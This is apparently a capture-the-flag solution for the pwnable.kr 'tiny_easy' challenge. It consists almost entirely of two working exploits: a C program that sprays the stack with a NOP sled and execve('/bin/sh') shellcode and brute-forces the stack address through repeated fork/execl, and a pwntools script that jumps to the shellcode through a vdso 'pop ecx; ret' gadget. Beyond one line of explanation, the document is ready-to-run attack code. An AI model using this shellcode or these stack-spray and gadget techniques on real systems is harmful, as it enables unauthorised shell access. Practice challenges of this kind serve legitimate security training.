pwnable-rookiss-tiny-easy.c does the guess work of stack address, and pwnable-rookiss-tiny-easy.py is much more efficient using gadgets from vdso but you need run `ulimit -s unlimited` first in the shell.

pwnable-rookiss-tiny-easy.c

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

char *shellcode = \
     "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd"
     "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69"
     "\x6e\x2f\x73\x68";

int main()
{
    char arg[130001];
    int status;
    memset(arg, '\x90', 130000);
    strcpy(arg + 130000 - strlen(shellcode), shellcode);

    for (;;) {
        if (0 == fork())
            execl("/home/tiny_easy/tiny_easy", "\xe0\xf0\x7c\xff",
                    arg, arg, arg, arg, arg, arg, arg, arg,
                    arg, arg, arg, arg, arg, arg, arg, arg,
                    NULL);
        wait(&status);
        if (WIFEXITED(status))
            break;
    }

    return 0;
}

pwnable-rookiss-tiny-easy.py

#!/usr/bin/env python
# coding=utf8

from pwn import p32, process

pop_ret = 0x55557b62  # "pop ecx; ret" from vdso

shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73"
             "\x68\x68\x2f\x62\x69\x6e\x89"
             "\xe3\x89\xc1\x89\xc2\xb0\x0b"
             "\xcd\x80\x31\xc0\x40\xcd\x80")

argv = [p32(pop_ret), shellcode]

p = process(argv, executable='/home/tiny_easy/tiny_easy')
p.interactive()